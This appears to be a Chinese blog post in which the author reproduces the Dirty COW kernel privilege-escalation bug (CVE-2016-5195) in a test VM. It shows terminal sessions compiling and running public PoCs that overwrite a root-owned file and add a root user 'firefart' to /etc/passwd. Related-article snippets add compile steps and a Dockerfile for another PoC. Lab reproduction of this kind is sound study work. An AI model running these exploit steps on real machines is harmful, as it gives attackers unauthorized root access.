复现dirtycow——CVE-2016-5195

最新推荐文章于 2025-03-05 16:20:00 发布
最新推荐文章于 2025-03-05 16:20:00 发布
阅读量2.1k 收藏
点赞数
分类专栏: 安全 Linux-Unix 文章标签: ubuntu linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/caiqiiqi/article/details/61208447
版权

又来复习了一下dirtycow,于是从我的U盘里载入了一个新的ubuntu-14.04-server,我想一定不要upgrade,不然就没有漏洞环境了。
然后我把ubuntu-14.04-server装好在我Mac里的VMWare之后,由于想要得到PoC的可执行文件,必须先用gcc对其进行编译,然而默认ubuntu最开始是没有gcc的,而且我想sudo apt-get install gcc也发现找不到包,,我突然蒙逼了。。。。然后最后网上搜答案才发现自己忘记sudo apt-get update了,导致出现了找不到gcc的错误(然后我不update,依然可以install vim…)。
复现过程如下:

cqq@ubuntu:~/repos/dirtycow$ ls
info.txt  pokemon.c
cqq@ubuntu:~/repos/dirtycow$ gcc -pthread pokemon.c -o pokemon
cqq@ubuntu:~/repos/dirtycow$ ls
info.txt  pokemon  pokemon.c
cqq@ubuntu:~/repos/dirtycow$ ls -al info.txt
ls: 初始化月份字符串出错
-rw-r--r-- 1 root root 9  3�� 10 20:45 info.txt
cqq@ubuntu:~/repos/dirtycow$ cat info.txt
i_am_cqq
cqq@ubuntu:~/repos/dirtycow$ ./pokemon info.txt you_are_hacked
info.txt
   (___)
   (o o)_____/
    @@ `     \
     \ ____, /you_are_hacked
     //    //
    ^^    ^^
mmap 7f4f276dd000

madvise 0

ptrace 0

cqq@ubuntu:~/repos/dirtycow$ cat info.txt
you_are_hcqq@ubuntu:~/repos/dirtycow$
cqq@ubuntu:~/repos/dirtycow$

据说加入-pthread选项是为了

可见编译选项中指定 -pthread 会附加一个宏定义 -D_REENTRANT ,该宏会导致 libc 头文件选择那些thread-safe的实现

原来是这样
http://chaoslawful.iteye.com/blog/568602

然后,当我sudo apt-get dist-upgrade之后,再运行PoC(这个PoC是可以直接修改root密码的!!!),则当前ssh连接断开!!!

cqq@ubuntu:~$ vi /etc/passwd
cqq@ubuntu:~$ cd ~/repos/dirty
cqq@ubuntu:~/repos/dirty$ ./dirty mypasswd
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: mypasswd
Complete line:
firefart:fii1PApS9Jm5Y:0:0:pwned:/root:/bin/bash

mmap: 7f2c458dc000
packet_write_wait: Connection to 192.168.170.164 port 22: Broken pipe
➜  ~

算了,下次再弄一个新的ubuntu来测试吧。先看看struts2的漏洞。

服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
m0_61506558的博客
12-20 831
Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。它从容器中逃了出来,因此我们形象的称为Docker逃逸漏洞
【漏洞复现CVE-2016-5195 DirtyCow 脏牛提权
李火火的安全圈
03-10 8675
文章目录声明一、漏洞原理二、漏洞概述及成因三、漏洞影响范围四、先决条件五、漏洞危害六、本地复现方法一方法二:总结 声明 本文章仅限于漏洞复现和技术学习,切勿用于非法用途,出现任何后果与本人无关 一、漏洞原理 Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kern
dirtycow 脏牛漏洞复现 (CVE-2016-5195)
box
10-29 1140
漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。 360 Vulpecker Team:Android 7.0最新的10月补丁...
CVE-2016-5195
weixin_33813128的博客
09-28 170
TODO:分析脏牛的exp 学习条件竞争漏洞 https://github.com/hyln9/VIKIROOT https://github.com/matteoserva/dirtycow-arm32 https://github.com/timwr/CVE-2016-5195 http://blog.csdn.net/trap0d/article/...
脏牛(Dirty COW)漏洞学习
最新发布
m0_63753692的博客
03-05 1038
脏牛(Dirty COW,全称“Copy-On-Write”漏洞,CVE-2016-5195)是 Linux 内核中的一个严重漏洞。它允许普通用户通过竞争条件)在内核的 COW 机制下获得写入只读映射文件的权限,从而实现本地权限提升(Privilege Escalation)。脏牛漏洞是由于 Linux COW 机制中的竞争条件导致的。该漏洞利用 GUP 机制使攻击者能够修改只读映射的文件。主要的利用方式是mmapmadvise触发竞争。
Lampiao(dirtycow)脏牛漏洞复现
weixin_34075268的博客
06-13 760
nmap扫描内网80端口发现目标主机 nmap -sP -p 80 192.168.31.0/24 扫描发现目标主机开放22端口、并且 1898端口开放http服务 御剑扫描目录并访问之后发现存在目录遍历漏洞 且部分文件可以下载 下载后浏览发现cms版本 寻找i相关漏洞...
脏牛Dirty漏洞复现
Polemo的博客
03-27 2099
漏洞范围: Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 危害: 低权限用户利用该漏洞可以在众多Linux系统上实现本地提权 简要分析: 该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改s...
CVE-2016-5195:Linux内核通杀提权漏洞预警
大方子
10-06 1277
Linux内核(英语:Linux kernel),是一种计算机操作系统内核,以C语言和汇编语言写成,匹配POSIX标准,以GNU通用公共许可证发布。 ——来自于维基百科 漏洞危害: 低权限用户可以利用该漏洞修改只读内存,进而执行任意代码获取 root 权限。 影响范围: 该漏洞影响所有 Linux Kernel >= 2.6.22的版本。 2.6.22 是 2007 年发...
CVE复现NO.00001】“脏牛”漏洞CVE-2016-5195复现及简要分析
arttnba3的博客
04-16 4160
CVE复现NO.00001】CVE-2016-5195复现及简要分析[github blog addr](https://arttnba3.cn/2021/04/08/NOTE-0X04-CVE-2016-5195/)0x00.一切开始之前一、写时复制机制(Copy-on-Write)basic COWmmap 与 COW二、缺页异常(page fault)分类①软性缺页异常(soft page fault)②硬性缺页异常(hard page fault)③无效缺页异常(invalid page faul
运维知识点-Docker从小白到入土
aming小老弟
11-04 571
获取某个系统shell后发现其是docker这时候我们就需要进行docker逃逸来拿到其真正宿主的权限。
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 1347
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
【小迪安全2023】第61天-服务攻防-中间件安全&CVE复现&K8s&Docker&uetty&Websphere
qq_44005305的博客
06-04 934
kubernetes简称k8s,是一个由google开源的,用于自动部署,扩展和管理容器化应用程序的开源系统。在B站内部,k8s在管理生产级容器和应用服务部署已经有较为广泛和成熟的应用。通过k8s,可跨多台主机进行容器编排、快速按需扩展容器化应用及其资源、对应用实施状况检查、服务发现和负载均衡等。
CVE-2016-5195:适用于Android的CVE-2016-5195dirtycowdirtyc0w)概念验证
04-06
CVE-2016-5195 CVE-2016-5195(脏牛/ dirtycow / dirtyc0w)适用于Android的概念证明 该存储库演示了通过ADB连接的易受攻击的Android设备上的漏洞。 它不会禁用SELinux(请参阅 )或在设备上安装超级用户。 $ make root ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16 make[1]: Entering directory '/home/user/dev/git/exploits/CVE-2016-5195' [arm64-v8a] Install : dirtycow => libs/arm64-v8a/dirtycow [arm64-v8a] Install : run-
dirty cow 试验
vbaspdelphi的专栏
10-26 3209
dirty cow 解释 https://dirtycow.ninja/ 下面的链接里面有当前暴露出来的一些exploit利用工具 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs 手动测试了dirtyc0w.c和dirty_passwd_adjust_cow,没有效果 # 编译代码 gcc -pthread dirtyc0w.c -o
脏牛提权(靶机复现
tubug的博客
03-26 4032
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
CVE-2016-5195 复现记录
CoLin的pwn小屋
03-03 1622
Dirty COW——CVE-2016-5195 复现与分析
[CVE-2016-5195]linux脏牛提权复现
https://www.cnblogs.com/zpchcbd/
08-21 503
1、复制源代码dirty.c到可读写目录-------》 /tmp/dirty.c 2、进行gcc编译-----------------------》gcc -pthread dirty.c -o dirty -lcrypt 3、运行编译好的文件-------------------./dirty 你设置的密码 4、如果一直卡住的话尝试反弹shell 在交互式中进行 ...
Linux本地提权—脏牛漏洞复现(CVE-2016-5195)
qq_51663706的博客
08-04 713
0x0前言 漏洞编号:CVE-2016-5195 漏洞危害:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。 复现环境:攻击机kali 靶机:https://www.vulnhub.com/en
脏牛漏洞(CVE-2016-5195复现过程(详细完整版)
qq_40898302的博客
01-19 2800
KaLi 攻击机Linux靶机 靶场实验目的:掌握漏洞利用的方法掌握脏牛漏洞的原理提高对内核安全性的认识。
CVE-2016-5195复现docker
02-27
### 复现CVE-2016-5195 Dirty COW漏洞的过程 为了在Docker环境中成功复现Dirty COW漏洞(CVE-2016-5195),环境准备至关重要。确保使用的操作系统内核版本存在此漏洞,通常较新的Linux发行版已经修复了这个问题[^2]。 创建适合的Docker镜像用于实验,基于`gebl/dirtycow-docker-vdso`项目中的Dockerfile可以构建一个合适的容器环境来重现这个漏洞[^3]。下面是一个简化后的Dockerfile示例: ```dockerfile FROM centos:7 RUN yum update -y && \ yum install -y gcc make git wget tar which strace WORKDIR /root/ RUN git clone https://github.com/scumjr/dirtycow-vdso.git WORKDIR /root/dirtycow-vdso ENV CGO_ENABLED=0 GOOS=linux GOARCH=amd64 RUN go build main.go CMD ["./main"] ``` 上述脚本会安装必要的依赖项并克隆包含PoC代码的仓库到容器内部,之后设置Go编译参数以交叉编译为目标平台,并最终执行编写的程序[^1]。 值得注意的是,在尝试运行任何潜在危险的代码之前,请务必确认所处环境的安全性和合法性;此外,由于安全更新的原因,某些旧版本软件可能不再容易获取或适用当前的操作系统版本。 关于具体操作命令如下所示: ```bash # 构建自定义镜像 $ docker build -t dirtycow-test . # 启动容器实例 $ docker run --rm -it dirtycow-test ``` 通过以上步骤可以在隔离环境下研究该漏洞的影响范围及其工作原理,但请注意仅限于合法授权的研究目的下进行此类活动。 #### 安全提示 考虑到实际应用中部署的服务应当及时打补丁防止被攻击者利用已知漏洞实施恶意行为,因此建议定期检查官方发布的安全公告并尽快升级至最新稳定版本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值